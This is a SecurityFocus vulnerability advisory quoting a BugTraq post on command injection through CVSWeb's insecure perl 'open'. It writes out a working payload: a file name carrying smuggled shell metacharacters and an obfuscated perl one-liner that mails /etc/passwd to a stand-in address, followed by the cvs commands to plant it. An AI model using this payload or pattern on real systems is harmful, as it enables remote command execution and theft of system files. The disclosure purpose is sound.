CVSWeb insecure perl "open" Vulnerability

From BugTraq Post:
An attack looks something like this:

SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"
touch $SHELLCODE
cvs add $SHELLCODE
cvs commit -m '' $SHELLCODE

Then the attacker either visits the cvsweb page that is a directory listing for the directory they put the trojan file in, or they wait for someone else to do the same. Views of this page cause the command to be executed, mailing /etc/passwd to the attacker or [insert something more nasty here].


 

Privacy Statement
Copyright 2010, SecurityFocus